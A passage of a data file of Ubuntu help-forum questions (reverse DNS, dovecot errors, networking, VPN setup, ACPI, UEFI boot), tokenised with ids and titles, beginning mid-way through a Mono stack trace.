system.net.sockets.socket.checkprotocolsupport ( ) [ 0x00000 ] in < filename unknown > :0 at system.net.sockets.socket..cctor ( ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at mono.webserver.xspwebsource.createsocket ( ) [ 0x00000 ] in < filename unknown > :0 at mono.webserver.applicationserver.start ( boolean bgthread ) [ 0x00000 ] in < filename unknown > :0 at mono.webserver.applicationserver.start ( boolean bgthread , system.exception initialexception ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper remoting-invoke-with-check ) mono.webserver.applicationserver : start ( bool , system.exception ) at mono.webserver.xsp.server.realmain ( system.string [ ] args , boolean root , iapplicationhost ext_apphost , boolean quiet ) [ 0x00000 ] in < filename unknown > :0
418084	how do i set up a reverse dns on ubuntu 12.04 vps	as far as i can remember when setting up my vps and mail server on it , i had configured the mail server correctly . however , a few of my clients get smtp errors , host mx1.zonnet.nl [ 62.58.50.9 ] said : 553 we do not accept mail from ip addresses without reverse dns . see http : //wikipedia.org/wiki/reverse_dns ( in reply to rcpt to command ) so could anyone get me further to address whether i 've configured it wrong or even worse : not configured at all . and of course : how to resolve it ? oh , i see that i did n't had bind installed , so that may help most of you . sadly , most tutorials i find are about different subjects , instead of resolving reverse dns on ubuntu 12.04 vps . thanks ! edit , extra : i 'm seeing things such as edit /etc/bind/named.conf.local and add the following : zone `` 1.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/db.192 '' ; } ; source where , 1.168.192 , need to replaced with my networking ip , but what 's my networking ip.. ? my ip ( v4 ) is completely different than 1.168.192 , which actually is 159.xxx.x.xxx .
418087	wired network is connected & acquires ip address but the internet is not working	so the other day when my network died completely without a warning at first . i thought it may have been the modem or the router ( the modem ca n't handle to many connections as its a a bit dodgy ) ; but neither was the problem . i had to re-install linux system due to a messed up graphics driver ( it was my fault which i did something totally wrong and could n't get it to work again ) . but my wired connection will not connect to the internet . i do have an ip address , submask , ipv6 address and the light on the ethernet port at the back is transmitting data with green & orange led 's , also my wifi connection still works perfectly . i 've posted my inxi output , syslog & ifconfig . if there is any one that can advise me a with this , that would be awesome . inxi -fxn output below : system : host : hydr4 kernel : 3.8.0-35-generic i686 ( 32 bit , gcc : 4.7.3 ) desktop : xfce 4.10.2 ( gtk 2.24.16 ) distro : linux mint 15 olivia machine : system : compaq-presario product : rr501aa-abu sr2129uk mobo : asustek model : leonite version : 5.00 bios : phoenix version : 5.10 date : 01/30/2007 cpu : dual core intel core2 cpu 6300 ( -mcp- ) cache : 2048 kb flags : ( lm nx sse sse2 sse3 ssse3 vmx ) bmips : 7469.08 clock speeds : 1 : 1600.00 mhz 2 : 1867.00 mhz graphics : card : nvidia gf119 [ geforce gt 610 ] bus-id : 01:00.0 x.org : 1.13.3 drivers : nvidia ( unloaded : fbdev , vesa , nouveau ) resolution : 1024x768 @ 60.0hz , 1024x768 @ 60.0hz glx renderer : geforce gt 610/pcie/sse2 glx version : 4.3.0 nvidia 310.44 direct rendering : yes audio : card-1 : intel nm10/ich7 family high definition audio controller driver : snd_hda_intel bus-id : 00:1b.0 card-2 : nvidia gf119 hdmi audio controller driver : snd_hda_intel bus-id : 01:00.1 sound : advanced linux sound architecture ver : k3.8.0-35-generic network : card-1 : intel nm10/ich7 family lan controller driver : e100 ver : 3.5.24-k2-napi port : ef00 bus-id : 02:08.0 if : eth0 state : up speed : 100 mbps duplex : full mac : 00:1a:92:69 : c7 : f1 card-2 : realtek rtl8187 wireless adapter driver : rtl8187 usb-id : 0bda:8187 if : wlan0 state : down mac : 00 : c0 : ca:75:44 : a7 ifconfig output : eth0 link encap : ethernet hwaddr 00:1a:92:69 : c7 : f1 inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21a:92ff : fe69 : c7f1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:419 errors:0 dropped:0 overruns:0 frame:0 tx packets:386 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33431 ( 33.4 kb ) tx bytes:44861 ( 44.8 kb ) syslog : feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > dhclient started with pid 4698 feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) beginning ip6 addrconf . feb 8 12:14:19 hydr4 avahi-daemon [ 1221 ] : withdrawing address record for fe80 : :21a:92ff : fe69 : c7f1 on eth0 . feb 8 12:14:19 hydr4 avahi-daemon [ 1221 ] : leaving mdns multicast group on interface eth0.ipv6 with address fe80 : :21a:92ff : fe69 : c7f1 . feb 8 12:14:19 hydr4 avahi-daemon [ 1221 ] : interface eth0.ipv6 no longer relevant for mdns . feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . feb 8 12:14:19 hydr4 dhclient : internet systems consortium dhcp client 4.2.4 feb 8 12:14:19 hydr4 dhclient : copyright 2004-2012 internet systems consortium . feb 8 12:14:19 hydr4 dhclient : all rights reserved . feb 8 12:14:19 hydr4 dhclient : for info , please visit https : //www.isc.org/software/dhcp/ feb 8 12:14:19 hydr4 dhclient : feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit feb 8 12:14:19 hydr4 dhclient : listening on lpf/eth0/00:1a:92:69 : c7 : f1 feb 8 12:14:19 hydr4 dhclient : sending on lpf/eth0/00:1a:92:69 : c7 : f1 feb 8 12:14:19 hydr4 dhclient : sending on socket/fallback feb 8 12:14:19 hydr4 dhclient : dhcprequest of 192.168.1.100 on eth0 to 255.255.255.255 port 67 ( xid=0x760a69a9 ) feb 8 12:14:19 hydr4 dhclient : dhcpack of 192.168.1.100 from 192.168.1.1 feb 8 12:14:19 hydr4 dhclient : bound to 192.168.1.100 -- renewal in 3099 seconds . feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > reboot feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > address 192.168.1.100 feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > prefix 24 ( 255.255.255.0 ) feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > gateway 192.168.1.1 feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > nameserver '192.168.1.1' feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... feb 8 12:14:19 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... feb 8 12:14:19 hydr4 avahi-daemon [ 1221 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.1.100 . feb 8 12:14:19 hydr4 avahi-daemon [ 1221 ] : new relevant interface eth0.ipv4 for mdns . feb 8 12:14:19 hydr4 avahi-daemon [ 1221 ] : registering new address record for 192.168.1.100 on eth0.ipv4 . feb 8 12:14:19 hydr4 kernel : [ 970.652409 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01 : a0 : f3 : c1:5b:80 : c4:08:00 src=192.168.1.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 feb 8 12:14:20 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] feb 8 12:14:20 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . feb 8 12:14:20 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] feb 8 12:14:20 hydr4 networkmanager [ 1233 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . feb 8 12:14:20 hydr4 networkmanager [ 1233 ] : < info > writing dns information to /sbin/resolvconf feb 8 12:14:20 hydr4 dnsmasq [ 1472 ] : setting upstream servers from dbus feb 8 12:14:20 hydr4 dnsmasq [ 1472 ] : using nameserver 192.168.1.1 # 53 feb 8 12:14:20 hydr4 avahi-daemon [ 1221 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :21a:92ff : fe69 : c7f1 . feb 8 12:14:20 hydr4 avahi-daemon [ 1221 ] : new relevant interface eth0.ipv6 for mdns . feb 8 12:14:20 hydr4 avahi-daemon [ 1221 ] : registering new address record for fe80 : :21a:92ff : fe69 : c7f1 on eth0.* . feb 8 12:14:25 hydr4 kernel : [ 977.312309 ] [ ufw block ] in=eth0 out= mac=01:00:5e:00:00:01 : a0 : f3 : c1:5b:80 : c4:08:00 src=192.168.1.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 feb 8 12:14:34 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) successful , device activated . feb 8 12:14:34 hydr4 dbus [ 1143 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) feb 8 12:14:34 hydr4 dbus [ 1143 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' feb 8 12:14:37 hydr4 nm-dispatcher.action : script '/etc/networkmanager/dispatcher.d/01ifupdown ' took too long ; killing it . feb 8 12:14:37 hydr4 networkmanager [ 1233 ] : < warn > dispatcher script timed out : script '/etc/networkmanager/dispatcher.d/01ifupdown ' timed out . feb 8 12:14:39 hydr4 networkmanager [ 1233 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . feb 8 12:14:39 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... feb 8 12:14:39 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... feb 8 12:14:39 hydr4 networkmanager [ 1233 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . ifconfig wlan0 connected : eth0 link encap : ethernet hwaddr 00:1a:92:69 : c7 : f1 inet6 addr : fe80 : :21a:92ff : fe69 : c7f1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:165 errors:0 dropped:1 overruns:0 frame:0 tx packets:272 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:26568 ( 26.5 kb ) tx bytes:40779 ( 40.7 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:272 errors:0 dropped:0 overruns:0 frame:0 tx packets:272 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:22856 ( 22.8 kb ) tx bytes:22856 ( 22.8 kb ) wlan0 link encap : ethernet hwaddr 00 : c0 : ca:75:44 : a7 inet addr:192.168.1.104 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2c0 : caff : fe75:44a7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1806 errors:0 dropped:0 overruns:0 frame:0 tx packets:1959 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1369477 ( 1.3 mb ) tx bytes:376277 ( 376.2 kb ) ifconfig eth0 connected : eth0 link encap : ethernet hwaddr 00:1a:92:69 : c7 : f1 inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21a:92ff : fe69 : c7f1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:171 errors:0 dropped:1 overruns:0 frame:0 tx packets:326 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:27505 ( 27.5 kb ) tx bytes:49977 ( 49.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:277 errors:0 dropped:0 overruns:0 frame:0 tx packets:277 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:23173 ( 23.1 kb ) tx bytes:23173 ( 23.1 kb ) wlan0 link encap : ethernet hwaddr 00 : c0 : ca:75:44 : a7 inet6 addr : fe80 : :2c0 : caff : fe75:44a7/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:1908 errors:0 dropped:0 overruns:0 frame:0 tx packets:2066 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1392844 ( 1.3 mb ) tx bytes:463109 ( 463.1 kb )
418088	how do i install catlateral damage ?	it 's this gam it 's a .tar.gz file ; and does n't contain any installation files . need some help . thanks in advance !
418090	unable to start dovecot	i am configuring my ubuntu server for mail use so i installed dovecot all required protocols but when i start dovecot i get the following error : doveconf : fatal : error in configuration file /etc/dovecot/dovecot.conf : service ( managesieve-login ) : executable is empty the only thing i did after running apt-get install is i added to the conf the following lines : protocols = pop3 imap mail_location = maildir : ~/maildir mail_location = mbox : ~/mail : inbox=/var/mail/ % u could somebody tell me what i am doing wrong . thanks
418095	lamp in sandbox	i am using denwer on ms windows . is there a ready-made solution , providing lamp in the sandbox on ubuntu 12.04 ? i want lamp isolated from the outside network and does n't require an internet connection . if not , how to do this ?
418099	network problem ubuntu 12.04	i installed ubuntu to my old machine p4b533 but it keeps asking for a network password , tries to connect then disconnects . now if i assigned a static ip it connects with no problems but cant even ping my router but it says it successfully connected . is this a bug ? what is the fix for this ?
418100	unable to tether iphone 's personal wireless hotspot on 13.10	in windows i could turn on person hotspot on the iphone , connect the iphone via usb and it would recognize the iphone hotspot and connect to it . on ubuntu 13.10 , i can see my files on connecting to the iphone but can not see the network . iphone tells me that there are three tethering options : wireless , usb and bluetooth . i would like to be able to use either of the first two options . how can i use the iphone personal hotspot with ubuntu 13.10 ? help would be greatly appreciated .
418103	disabling windows only features ( intel srt , etc ) so i can install ubuntu ( dell xps 15 )	i 'm working on installing xubuntu on a dell xps 15 and i trust this guide . it says i should do the following : turn secure boot off . turn fast boot off . turn intel srt off . remove raid meta-data from the hard drives i 've turned secure boot off in the bios , i did n't see anything about fast boot there though ( do i really need to turn it off ? is it perhaps set within windows ? maybe my machine does n't have it ? ) and now i 'm trying to disable intel srt , it seems i 'm suppose to open the intel srt gui `` and disable it there '' , easy enough , except i do n't see a disable option for srt . i 'm in the intel rapid storage technology gui and there are 5 tabs : status , manage , performance , preference , and help . the only option for disabling anything is found in performance under smart response technology , but it 's called `` acceleration configuration '' and says : accelerated devices : sata disk on controller 0 , port 0 ( system ) disable acceleration . is that it ? should i just click `` disable acceleration '' ? and then i have disabled intel srt ? i do n't want to disable anything i 'm not suppose to . if that 's it and i do n't need to disable fast boot then i just need to remove the raid meta-data , which is done with the following commands in ubuntu : sudo dmraid -e -r /dev/sda sudo dmraid -e -r /dev/sdb and then i 'm set to install i would assume , right ?
418105	detect samsung tab as usb modem using gnome-ppp	i exploit internet in pc by tethering usb from samsung tab2 : internet works fine , however , i can not configure this device as usb modem using gnome-ppp i set /dev/ttys0 , because when i run this cmd ls -l /dev/ttys0 i get : known that i saw this documentationbut no result : does gnome-ppp requires some configurations before using it , such as , setserial or what and how ? udpate : log :
418106	why does n't ubuntu make it 's own file manager	i do n't like the current nautilus , and i think the upcoming versions are just going to make it worse , so why does n't ubuntu make it 's own file manager ? just like mint did with nemo ) , or at least fork nemo , i do n't think i 'm the only one who has this idea .
418109	make crontab not asking for id_rsa keyword when running in terminal	i like to do some git pull inside a script and see see output of it . so i made up this cronjob to test : display=:0 * * * * * mike /usr/bin/gnome-terminal -x zsh -c `` /var/www/up.sh ; zsh '' -- window-with-profile=/home/mike/.profile running the cronjob within an own shell , keep open after that and for god sake use me as the owner and my profile . it is the crontab for the user `` mike '' also . but this keeps nagging me about the id_rsa keyword everytime for every project it shall do a pull in . how can i get rid of that and make it use the id_rsa ? the crontab will later on always run when i am logged in .
418111	setting up l2tp/ipsec vpn server with openswan fails during ipsec authentication	i 'm trying to set up my linode server ( ubuntu 12.04.4 lts ) to act as a l2tp/ipsec vpn server for when i 'm traveling in china so that i can access facebook/twitter/youtube on the go . i 've followed many tutorials on setting it up , but every time i get to checking the auth.log nothing comes though , and i just get the error that the vpn server did not respond . i have checked my iptables , and ipsec verify comes through with everything [ ok ] . could someone try and give me a command by command install for this ? this is what i have been doing so far : $ sudo aptitude install openswan // use an x.509 certificate for this host ? no // old runlevel management superseded $ sudo nano /etc/ipsec.conf // deleted all , inserted this version 2.0 config setup nat_traversal=yes virtual_private= % v4:10.0.0.0/8 , % v4:192.168.0.0/16 , % v4:172.16.0.0/12 oe=off protostack=netkey conn l2tp-psk-nat rightsubnet=vhost : % priv also=l2tp-psk-nonat conn l2tp-psk-nonat authby=secret pfs=no auto=add keyingtries=3 rekey=no ikelifetime=8h keylife=1h type=transport left= [ my server 's public ip ] leftprotoport=17/1701 right= % any rightprotoport=17/ % any $ sudo nano /etc/ipsec.secrets // deleted all , inserted this [ my server 's public ip ] % any : psk `` psk '' $ nano adjust-redirects // inserted this for each in /proc/sys/net/ipv4/conf/* do sudo echo 0 > $ each/accept_redirects sudo echo 0 > $ each/send_redirects done $ sudo bash adjust-redirects $ sudo ipsec verify // all ok except for opportunistic encryption support which is disabled $ sudo /etc/init.d/ipsec restart // at this point i tried to connect while monitoring the log , nothing happened and i got the 'server did not respond ' error above .
418117	window resize area , firefox automaximizes and giant ubuntu bar	everybody yesterday ( feb 07 , 2014 ) i updated my ubuntu 12.04 and now i 'm feeling i 'm going postal ! the ubuntu bar changed its size for the comfortable 24px i had set to 20457px or something equally ridiculous . the systems now only allows it to set it to 32px . whenever i change desktops , my firefox windows get maximized . the area to resize windows changed for my comfortable 6px to the usual sociophatic 1/4px with which ubuntu usually punishes its users . so my questions are : how do i undo those crappy `` improvements '' ? why ubuntu hates its users ? sorry for the rant . my questions are sincere . i want my old configuration back and i 'm pissed for this `` i know better than you '' attitude of this last upgrade .
418120	install and run a program from a flash drive ? 13.10	i 'm running chrubuntu 13.10 on a samsung series 5 550 chromebook , and due to the limited hard drive space it 's running on a 8gb partition . i 'd like to run tuxguitar off of a usb flash drive to save harddrive space . is there any way i could do this ? i have a 16gb flash drive i am happy to re-format to ntfs if that would be a requirement ?
418122	what is the difference between sudo -i and sudo -s	i am new ubuntu user and found some people telling me to use sudo -i to get to root and others tell me to use sudo -s. what is the difference ? which one do i use and when ?
418125	when using the same firefox profile in ubuntu and windows , how can i keep settings consistent ?	i access the same firefox profile in ubuntu 12.04 and windows 8.1 ( windows fast startup disabled ) . i have the newest version of firefox ( 26.0 ) on each system . every time i launch firefox in ubuntu after using the profile in windows , i notice that autoscrolling is disabled . so i have to manually enable it every time after using my profile in windows . conversely , every time i launch firefox in windows after using the profile in ubuntu , i 'm asked whether i would like to set firefox as my default browser . i choose `` no '' , first making sure that there is no check mark next to `` always perform this check when starting firefox '' . i have to do this every time after using my profile in ubuntu , despite the fact that if i check my preferences in either os , `` always check to see if firefox is the default browser on startup '' is not enabled . note that firefox is my default browser in ubuntu but not in windows , but i have no need for firefox to check whether it 's the default every time it starts in either os . i do n't know for sure whether these problems are related , but it seems likely that they are . is there a way that i can keep these settings constant , so they do n't reset every time i switch operating systems ? i asked about this one week ago on the firefox support forum but have n't found an answer so far . since i know a lot of ubuntu/windows dual-booters frequent ask ubuntu , i thought this question might be useful here for others facing the same problem .
418126	how to force device detection and diagnose issues	i 'm using an acer aspire v3 571g . it originally had windows 7 installed but after sustaining some physical trauma it became unable to boot , judging by the scratching sound one of the hard drive 's read/write arms had become slightly displaced . using a friend 's computer i made a bootable usb , made the malfunctioning parts of the hdd inaccessible and installed ubuntu desktop . unfortunately the wlan0 nic is n't being detected ( no switch is visible ) . how can i rectify this ? i should also point out ethernet is not an option for downloading utilities ( i 'm writing this on my phone ) . the end goal is either connecting to the internet or confirming i need a new nic .
418132	module `` ide-cs '' in precise ?	is there a way to install/activate the ide-cs module in precise ? i 'm trying to mount a compactflash drive ( which is on the pcmcia-bus ) , but when i 'm trying to `` modprobe ide-cs '' i get a message that the module `` ide_cs '' is not installed . when i installed the system , using oneiric , it detected the drive just fine . but there also i failed to load it at boot . i 'm just trying to get that drive mounted so i can `` back-up '' configuration files ( of an asterisk server ) to that drive , just in case something goes wrong with the hard disks . jurgen
418134	only transmission can use internet , not firefox or the software store	i have a slightly old pc which has intel pentium dual core @ 2.o ghz and 512 mb of memory , which is obviously designed for win xp . but since i like linux over windows , i just recently installed ubuntu and now when i connect my dsl model it shows connected and only transmission ( bittorrent ) can download and upload . even when i open firefox it shows “connecting” and after that goes out ! but when i type a search in the google bar in the right panel , i 'm only having list of sites as google displays and when try to open any of the sites , it will again go to “connecting” ! in short no application can use the internet connection , except transmission . what could be the problem ?
418135	function keys disabled after enabling scroll lock	i had enabled the scroll lock key for my illuminated keyboard by using xmod , now my function keys do n't work whenever i enable the scroll lock ... i use the function keys for shortcuts , assistance would be greatly appreciated ...
418137	module acpi not found	my os is 12.04 , i 'm not able to suspend and wake up my pc at given time , or better if i run sudo rtcwake -m mem -s 120 my pc enter suspend mode and the power-on light turns up after 2 minutes , but there are no keyboard i/o , no video card working , the pc seems to be turned off , there is only the power-on light to give me the illusion of a running os . furthermore when i run : sudo ls -l /lib/modules/ $ ( uname -r ) /kernel/drivers/acpi i got total 100 -rw-r -- r -- 1 root root 8108 apr 10 2013 acpi_ipmi.ko -rw-r -- r -- 1 root root 13908 apr 10 2013 acpi_pad.ko drwxr-xr-x 2 root root 4096 apr 15 2013 apei -rw-r -- r -- 1 root root 5728 apr 10 2013 ec_sys.ko -rw-r -- r -- 1 root root 10012 apr 10 2013 pci_slot.ko -rw-r -- r -- 1 root root 9696 apr 10 2013 sbshc.ko -rw-r -- r -- 1 root root 12156 apr 10 2013 sbs.ko -rw-r -- r -- 1 root root 25616 apr 10 2013 video.ko but when i run sudo modprobe acpi i got fatal : module acpi not found . my pc is a fitpc2 and in its website the bios is mentioned to be 'rtc wake-up acpi availability through os ( s3 ) ' when running dmesg |grep acpi output is [ 0.000000 ] acpi : lapic ( acpi_id [ 0x00 ] lapic_id [ 0x00 ] enabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x01 ] lapic_id [ 0x01 ] enabled ) [ 0.000000 ] acpi : lapic_nmi ( acpi_id [ 0x00 ] high edge lint [ 0x1 ] ) [ 0.000000 ] acpi : lapic_nmi ( acpi_id [ 0x01 ] high edge lint [ 0x1 ] ) [ 0.876584 ] acpi : requesting acpi_cpufreq [ 0.897585 ] pata_acpi 0000:00:1f.1 : setting latency timer to 64 [ 3.392784 ] acpi device:04 : registered as cooling_device2 [ 3.445689 ] acpi device:05 : registered as cooling_device3 any idea pls ? do i have to enable acpi in kernel ? how ? i tried to modify grub with acpi=force but nothing happens . i read about setting the kernel environment variable hint.acpi.0.disabled=0 that would enable acpi but how to pass this parameter ? in which file ? thank you for your attention , have a good day
418139	browser tends to download php files nstead of displaying them , while using xampp for linux	i am using xampp for linux , but when i try to open a php file saved in a folder saved in home directory , the browser downloads the php file instead of displaying it , what could be the problem ? xampp status is : component status hint mysql database activated php activated perl activated common gateway interface ( cgi ) activated server side includes ( ssi ) activated php extension »opcache« deactivated see faq php extension »oci8/oracle« activated some changes to the configuration sometime may cause false negative status reports . what could be a possible solution ?
418140	twitter account management for linux - mass unfollow based on filter	i got my twitter account hacked , and thousands of spam tweets with links to dodgy websites posted , also i now follow thousands of accounts of absolute no interest to me . while i managed to find tools that deletes mass tweets , i could n't find something that works with unfollowing accounts based on filters . i tried a bunch of website and i tried to download tweet added , but it would n't start on my ubuntu . any ideas ? tools ? whether online or linux based ... regards
418141	reset compiz from command-line	i am considering enabling the ring switcher ( or other ) effects that come along with compiz extras on my ubuntu 13.10 . the default app switcher is not that much to my liking - navigating multiple windows of a same app is clumsy as hell and overall it 's very old school . so when i am about to add the ring switcher to replace the default alt-tab behavior , an intimidating : ) question about whether i choose to ignore or resolve conflicts show up . would there be a way for me to reset all this setup back from the command-line in case that renders my server desktopless as some people have reported about other kinds of compiz fiddling ? there 's a whole slew of stuff at how can i reset compiz settings to default ? and i really wonder which of them is the clean way if any . also will applying this change still be safe once i 'd upgrade to the future ubuntu 14.04 ?
418143	how to run ubuntu 13.10 along windows 8 ?	i can not dual boot between 8 and ubuntu 13.10 , could anyone have the solution ? after i tried to install ubuntu in a part ion i can not see the dual boot menu.now i can not use 8.please help
418146	how to listen to hong kong rthk radio with lubuntu ?	i want to listen to rthk with lubuntu 13.10 firefox 26.0 . however , when i went to the above webpage ( for example ) , firefox always asks me to select a player for it . i tried to select mplayer , vlc , audacious , ... but it does n't work . is there a way to solve this problem ? please help . thank you very much !
418147	ubuntu 12.04 startup problem	[ 1.084901 ] kernal panic-not syncing : no unit found.try passing init=option to kernal , see linux documentation/init.txt for guidance hi friends.. , this is the text shown by my compaq presario cq61 , and i am using ubuntu 12.04.4 lts , when i tried it it worked properly , but after i installed that to my laptop , that 's showing the above text ... ... ... and i am a new ubuntu user ... .need help friends ... ... ... ..
418150	computer hangs on boot logo when using `` power '' button	so after a long day fighting with uefi and later on trying to get grub to play nice with uefi , i have managed to dual-boot ubuntu 13.10 on my sony vaio `` tap 20 '' ( the big , touchscreen , all-in-one desktop thing ) ... and i know both operating systems ( microsoft windows 8.1 and ubuntu 13.10 ) are working , because i have used them both post-install . the problem is , since i last shutdown the computer from within ubuntu ( via the power menu , nothing special ) , the computer now hangs on the `` vaio '' logo ... it just sits there doing nothing , and refusing to load grub or boot to an operating system . the computer currently has secure boot disabled , but has uefi enabled ( changing the latter to `` legacy '' simply gives a `` no operating system found '' error immediately after the `` vaio '' logo ) . furthermore , my computer is currently set to boot from the hard disk first , then removable storage ( it was the other way around previously , with the same results ) . at this stage , the only way i can get past the `` vaio '' logo is if i boot into the vaiocare recovery menu via the `` assist '' button and select the option to boot from removable storage ... any help would be appreciated . -- edit : it works if i use the vaiocare recovery menu via the `` assist '' button and select the `` boot to windows '' ( not the exact wording ) option ... the computer goes straight to grub , where i can select the appropriate option . the power button itself however , produces the results above ...
418151	how to set applications as the default view in gnome shell activities	in gnome shell 3.10 , when i click on the activities button i want to launch the application view instead of the window-overview . i allready found this question : unfortunately this solution does n't work in 3.10 anymore . do you maybe have an idea about this ? thanks !
418153	search music with using google2ubuntu	how to search music in rhythmbox with using google2ubuntu ? ? i got this interesting software voice recognition software google2ubuntu creator of this software stated that you can add commends to it , so does any one know what commend to add to it so it can search and play from rhythmbox ? ? i believe google2ubuntu* config files should be altered as well ? ? thank you in advanded
418156	can not connect to internal network	i just got a system76 gazelle laptop with ubuntu 13.10 . i can connect to the internet via a wired ethernet . but i can not connect to my wired ethernet internal network . i have a file server ( internal network ) that has its own ip address and my gazelle does not see the connection . i can connect to the network with my windows xp dell laptop . what do i have to do to connect to my internet network with my gazelle ? please help ! here is my ipconfig . bioscorpion @ bioscorpion-gazelle-professional : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:90 : f5 : f4:8d:9d inet6 addr : fe80 : :290 : f5ff : fef4:8d9d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8891 errors:0 dropped:0 overruns:0 frame:0 tx packets:7933 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8377799 ( 8.3 mb ) tx bytes:1326689 ( 1.3 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:700 errors:0 dropped:0 overruns:0 frame:0 tx packets:700 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:69868 ( 69.8 kb ) tx bytes:69868 ( 69.8 kb )
